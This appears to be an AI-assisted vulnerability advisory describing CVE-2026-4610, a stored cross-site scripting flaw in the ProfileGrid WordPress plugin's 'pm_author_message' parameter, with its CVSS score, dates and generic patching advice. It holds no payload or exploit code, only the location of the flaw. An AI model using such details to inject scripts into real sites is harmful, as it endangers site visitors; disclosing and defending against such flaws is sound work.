PatchSiren

PatchSiren cyber security CVE debrief

CVE-2026-4610 metagauss CVE debrief

The ProfileGrid – User Profiles, Groups and Communities plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'pm_author_message' parameter in the pm_send_message_to_author function in all versions up to, and including, 5.9.9.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability was partially patched in version 5.9.8.5. The CVE was published on June 23, 2026, at 13:16:41 UTC and last modified on June 23, 2026, at 14:32:14 UTC. The CVSS score is 6.4, and the severity is MEDIUM.

Vendor
metagauss
Product
ProfileGrid – User Profiles, Groups and Communities
CVSS
MEDIUM 6.4
CISA KEV
Not listed in stored evidence
Original CVE published
2026-06-23
Original CVE updated
2026-06-23
Advisory published
2026-06-23
Advisory updated
2026-06-23

Who should care

WordPress users who have installed the ProfileGrid – User Profiles, Groups and Communities plugin, especially those with Subscriber-level access and above, should be aware of this vulnerability. They should check their plugin version and update to a patched version if necessary. Additionally, users should be cautious when accessing pages that may have been injected with arbitrary web scripts.

Technical summary

The ProfileGrid – User Profiles, Groups and Communities plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the 'pm_author_message' parameter. The vulnerability exists in all versions up to, and including, 5.9.9.2, and is caused by insufficient input sanitization and output escaping. An attacker with Subscriber-level access and above can inject arbitrary web scripts, which will execute when a user accesses an injected page. The vulnerability was partially patched in version 5.9.8.5. The CVSS vector is CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N.

Defensive priority

Medium priority should be given to patching this vulnerability, as it allows for Stored Cross-Site Scripting. Users with Subscriber-level access and above can exploit this vulnerability. The CVSS score is 6.4, and the severity is MEDIUM.

Recommended defensive actions

  • Update the ProfileGrid – User Profiles, Groups and Communities plugin to a patched version if necessary.
  • Monitor for suspicious activity, such as injected web scripts.
  • Implement additional security measures, such as input validation and output escaping.
  • Restrict access to the plugin's functionality to authorized users only.
  • Regularly review and update plugins to ensure they are secure and up-to-date.

Evidence notes

The CVE-2026-4610 vulnerability was reported by [email protected]. The vulnerability exists in the ProfileGrid – User Profiles, Groups and Communities plugin for WordPress. The CVSS score is 6.4, and the severity is MEDIUM. The CVE was published on June 23, 2026, at 13:16:41 UTC and last modified on June 23, 2026, at 14:32:14 UTC.

Official resources

This article is AI-assisted and based on the supplied source corpus.